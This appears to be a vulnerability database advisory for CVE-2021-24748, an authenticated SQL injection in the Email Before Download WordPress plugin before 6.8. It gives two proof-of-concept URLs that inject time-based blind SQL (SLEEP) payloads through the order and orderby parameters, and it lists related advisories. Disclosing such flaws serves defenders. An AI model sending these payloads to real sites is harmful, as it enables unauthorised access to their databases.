Email Before Download < 6.8 – Admin+ SQL Injection | CVE 2021-24748 | Plugin Vulnerabilities

Description

The plugin does not properly validate and escape the order and orderby GET parameters before using them in SQL statements, leading to authenticated SQL injection issues

Proof of Concept

https://example.com/wp-admin/admin.php?page=email-before-download-links&order=desc&orderby=time_requested+AND+%28SELECT+1554+FROM+%28SELECT%28SLEEP%285%29%29%29gPZH%29

https://example.com/wp-admin/admin.php?page=email-before-download-links&orderby=time_requested&order=+AND+%28SELECT+42+FROM+%28SELECT%28SLEEP%285%29%29%29b%29

Affects Plugins

email-before-download

Fixed in 6.8

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

bl4derunner

Submitter

Anton Sarsadskikh

Verified

Yes

WPVDB ID

a8625b84-337d-4c4d-a698-73e59d1f8ee1

Timeline

Publicly Published

2021-11-01 (about 4 years ago)

Added

2021-11-01 (about 4 years ago)

Last Updated

2022-04-09 (about 3 years ago)

Other

Published

Title

Published

2021-08-04

Title

Availability Calendar < 1.2.1 - Authenticated SQL Injection

Published

2024-03-28

Title

WP ERP <= 1.12.9 - Authenticated (AccountingManager+) SQL Injection

Published

2025-05-27

Title

Likes and Dislikes Plugin <= 1.0.0 - Unauthenticated SQL Injection

Published

2024-01-03

Title

Randomize <= 1.4.3 - Authenticated (Contributor+) SQL Injection

Published

2023-11-28

Title

WP Mail Log < 1.1.3 – Contributor+ SQL Injection in wml_logs endpoint